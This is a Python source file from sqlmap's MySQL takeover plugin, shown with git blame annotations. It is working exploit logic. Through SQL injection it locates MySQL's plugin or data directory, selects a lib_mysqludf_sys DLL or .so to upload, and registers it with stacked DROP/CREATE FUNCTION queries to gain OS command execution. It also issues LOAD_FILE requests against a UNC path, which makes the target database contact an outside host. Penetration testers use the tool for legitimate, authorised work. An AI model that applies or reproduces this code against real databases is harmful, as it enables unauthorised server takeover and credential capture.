2010-03-23 01:57:57 +03:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
2010-10-14 18:41:14 +04:00
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2010-03-23 01:57:57 +03:00
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
|
|
|
from lib.core.common import normalizePath
|
|
|
|
from lib.core.common import ntToPosixSlashes
|
|
|
|
from lib.core.common import randomStr
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import paths
|
|
|
|
from lib.request import inject
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
|
|
|
|
from plugins.generic.takeover import Takeover as GenericTakeover
|
|
|
|
|
|
|
|
class Takeover(GenericTakeover):
|
|
|
|
def __init__(self):
|
2010-07-01 14:39:04 +04:00
|
|
|
self.__basedir = None
|
|
|
|
self.__datadir = None
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
GenericTakeover.__init__(self)
|
|
|
|
|
|
|
|
def udfSetRemotePath(self):
|
|
|
|
self.getVersionFromBanner()
|
|
|
|
|
|
|
|
banVer = kb.bannerFp["dbmsVersion"]
|
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0
|
|
|
|
if banVer >= "5.1.19":
|
|
|
|
if self.__basedir is None:
|
|
|
|
logger.info("retrieving MySQL base directory absolute path")
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir
|
|
|
|
self.__basedir = inject.getValue("SELECT @@basedir")
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
if re.search("^[\w]\:[\/\\\\]+", self.__basedir, re.I):
|
|
|
|
kb.os = "Windows"
|
|
|
|
else:
|
|
|
|
kb.os = "Linux"
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin
|
|
|
|
if kb.os == "Windows":
|
|
|
|
self.__basedir += "/lib/plugin"
|
|
|
|
else:
|
|
|
|
self.__basedir += "/lib/mysql/plugin"
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
self.__basedir = ntToPosixSlashes(normalizePath(self.__basedir))
|
|
|
|
self.udfRemoteFile = "%s/%s.%s" % (self.__basedir, self.udfSharedLibName, self.udfSharedLibExt)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
logger.warn("this will only work if the database administrator created manually the '%s' subfolder" % self.__basedir)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
|
|
|
|
# On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
|
|
|
|
else:
|
|
|
|
#logger.debug("retrieving MySQL data directory absolute path")
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
|
|
|
|
#self.__datadir = inject.getValue("SELECT @@datadir")
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# NOTE: specifying the relative path as './udf.dll'
|
|
|
|
# saves in @@datadir on both MySQL 4.1 and MySQL 5.0
|
|
|
|
self.__datadir = "."
|
|
|
|
self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir))
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-07-01 14:39:04 +04:00
|
|
|
# The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
|
|
|
|
# C:\WINDOWS\system32, @@basedir\bin or @@datadir
|
|
|
|
self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
def udfSetLocalPaths(self):
|
|
|
|
self.udfLocalFile = paths.SQLMAP_UDF_PATH
|
|
|
|
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
|
|
|
|
|
|
|
|
if kb.os == "Windows":
|
|
|
|
self.udfLocalFile += "/mysql/windows/32/lib_mysqludf_sys.dll"
|
|
|
|
self.udfSharedLibExt = "dll"
|
|
|
|
else:
|
|
|
|
self.udfLocalFile += "/mysql/linux/32/lib_mysqludf_sys.so"
|
|
|
|
self.udfSharedLibExt = "so"
|
|
|
|
|
|
|
|
def udfCreateFromSharedLib(self, udf, inpRet):
|
|
|
|
if udf in self.udfToCreate:
|
|
|
|
logger.info("creating UDF '%s' from the binary UDF file" % udf)
|
|
|
|
|
|
|
|
ret = inpRet["return"]
|
|
|
|
|
|
|
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
|
|
|
|
inject.goStacked("DROP FUNCTION %s" % udf)
|
|
|
|
inject.goStacked("CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt))
|
|
|
|
|
|
|
|
self.createdUdf.add(udf)
|
|
|
|
else:
|
|
|
|
logger.debug("keeping existing UDF '%s' as requested" % udf)
|
|
|
|
|
|
|
|
def uncPathRequest(self):
|
|
|
|
if not kb.stackedTest:
|
2010-10-25 18:11:47 +04:00
|
|
|
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
|
2010-03-23 01:57:57 +03:00
|
|
|
query = agent.postfixQuery(query)
|
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
|
|
|
|
Request.queryPage(payload)
|
|
|
|
else:
|
|
|
|
inject.goStacked("SELECT LOAD_FILE('%s')" % self.uncPath, silent=True)
|